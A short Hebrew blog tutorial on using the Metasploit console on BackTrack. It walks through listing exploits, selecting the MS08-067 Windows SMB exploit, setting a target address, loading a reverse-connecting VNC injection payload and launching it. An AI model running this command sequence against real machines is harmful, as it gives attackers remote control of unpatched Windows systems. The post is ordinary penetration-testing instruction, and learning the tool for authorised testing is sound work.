כמו שאמרתי במאמר הקודם על Metasploit ניתן לעבוד עם ה Framework בכמה דרכים, 2 הדרכים הנוחות יותר לעבודה הן ה GUI וה WEB שם הכל מוגש על מגש של זהב מה שנשאר לך זה לבחור את ה Exploit שאתה רוצה ופשוט להפעיל אותו בסביבה כלכך נוחה אבל האקרים אמיתיים מעדיפים את ה Console למרות שלפעמים אתה שואל את עצמך למה?! הרי יש לך ממשקים כלכך נוחים ועדיין מעדיפים את ה Console אבל כנראה שהרגלים לא פשוט לשנות והפעם אני יסביר איך משתמשים ב Console .
אני יסביר את העבודה עם ה Console ע"ג BACKTRACK.
דבר ראשון נפעיל את ה Console
על מנת לראות את כל ה Exploits שב Framework
msf > show exploits
על מנת להשתמש ב Exploit
msf > use windows/smb/ms08_067_netapi
לאחר שבחרנו את ה Exploit נראה איזה Payloads ניתן לטעון בו:
msf > show payloads
על מנת לראות את הפרמטרים שב Exploit
msf > show options
טעינת הפרמטרים בערכים:
msf > set RHOST 192.168.1.105
טעינת ה Payload ל Exploit
msf > set payload windows/vncinject/reverse_tcp
הפעלת ה Exploit
msf > exploit
והפעלתם את ה Exploit.
בהצלחה...
אין תגובות:
הוסף רשומת תגובה